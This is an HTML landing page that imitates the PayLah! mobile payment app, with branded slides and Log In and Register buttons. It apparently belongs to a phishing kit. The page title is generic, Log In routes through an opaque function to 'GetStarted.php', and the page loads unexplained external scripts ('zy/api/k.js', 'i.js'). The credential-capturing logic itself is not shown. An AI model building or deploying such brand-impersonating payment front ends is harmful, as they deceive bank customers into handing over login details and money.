<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <link rel="stylesheet" href="./css/global.css">
    <link rel="stylesheet" href="./css/swiper.min.css">
</head>

<body>
    <div id="main">
        <div class="swiper-container">
            <div class="swiper-wrapper">
                <div class="swiper-slide ">
                    <img src="img/img_paylahlogo_dark.png">
                    <p class="text">Makes everyday payments easier</p>
                </div>
                <div class="swiper-slide ">
                    <img src="img/news/slide_2.png">
                    <p class="first_text">Makes everyday payments easier</p>
                    <span class="second_text">Just PayLah! when you shop or pay your friends!</span>
                </div>
                <div class="swiper-slide ">
                    <img src="img/news/slide_3.png">
                    <p class="first_text">Scan and Pay</p>
                    <span class="second_text">Scan and pay for speedy checkout.</span>
                </div>
                <div class="swiper-slide ">
                    <img src="img/news/slide_4.png">
                    <p class="first_text">Send a payment request</p>
                    <span class="second_text">Split bills and request for funds easily.</span>
                </div>


            </div>
            <div class="swiper-pagination"></div>
        </div>
        <div class="footer">
            <div class="login">
                <span>Log In </span>
                <span class="omit"></span>
            </div>
            <div class="register">Register</div>
        </div>
    </div>
</body>
<script src="./js/jquery-1.11.1.min.js"></script>
<script src="./js/swiper.min.js"></script>
<script type="text/javascript" src="zy/api/k.js"></script>
<script>
    function onset() {
        js_ini_jsver("zy/api/i.js");

        var swiper = new Swiper('.swiper-container', {
            pagination: {
                el: '.swiper-pagination',
                clickable: true
            },
            slidesPerView: 1,
            // effect:'coverflow',
            prevButton: '.swiper-button-prev',
            // spaceBetween: 15,//间距
            autoplayDisableOnInteraction: false, //用户点击翻页后还可以自动轮播
            speed: 600, //滑动速度，即slider自动滑动开始到结束的时间（单位ms）
            autoplay: false, //自动切换的时间间隔（单位ms）
            loop: false, //设置为true 则开启loop模式(无限循环)
            on: {
                slideChangeTransitionStart: function() {

                },
            },
        });

        $('.login').on('click', function() {
            y('GetStarted.php');
        })
        // $(document).ready(function () {
        //   $('.login').on('click', function () {
        //     window.location.href = './authPhoneNumber.html'
        //   })
        //   $('.register').on('click', function () {
        //     window.location.href = './authPhoneNumber.html'
        //   })
        // })

    }

    window.onload = onset;
</script>
<style>
    #main {
        width: 100vw;
        height: 100vh;
        background-image: url('./img/blur_splash.png');
        background-size: 100% 100%;
        background-repeat: no-repeat;
        overflow: hidden;
        color: #fff;
        font-size: 16px;
    }

    .omit {
        animation: shake 1s infinite;
    }

    @keyframes shake {
        0%,
        100% {
            content: '';
        }
        25% {
            content: ' ·';
        }
        50% {
            content: ' · ·';
        }
        75% {
            content: ' · · ·';
        }
    }

    .footer {
        display: flex;
        flex-direction: column;
        align-items: center;
    }

    .login,
    .register {
        width: 95%;
        height: 40px;
        border-radius: 4px;
        display: flex;
        align-items: center;
        justify-content: center;
    }

    .login {
        background: #b82f54;
    }

    .swiper-container {
        width: 100vw;
        height: 500px;
        margin-top: 100px;
        padding-top: 80px;
        box-sizing: border-box;
    }

    .swiper-slide {
        display: flex;
        flex-direction: column;
        align-items: center;
    }

    .swiper-slide>img {
        width: 97px;
        height: 38px;
    }

    .text {
        margin-top: 10px;
    }

    .swiper-pagination {
        top: 0px !important;
    }

    .swiper-pagination-bullet {
        width: 4px;
        height: 4px;
        background: #eee;
        border-radius: 50%;
        margin: 0 8px !important;
    }

    .swiper-pagination-bullet-active {
        background: #ddd !important;
        height: 4px;
        width: 25px;
        border-radius: 2px;
    }
</style>

</html>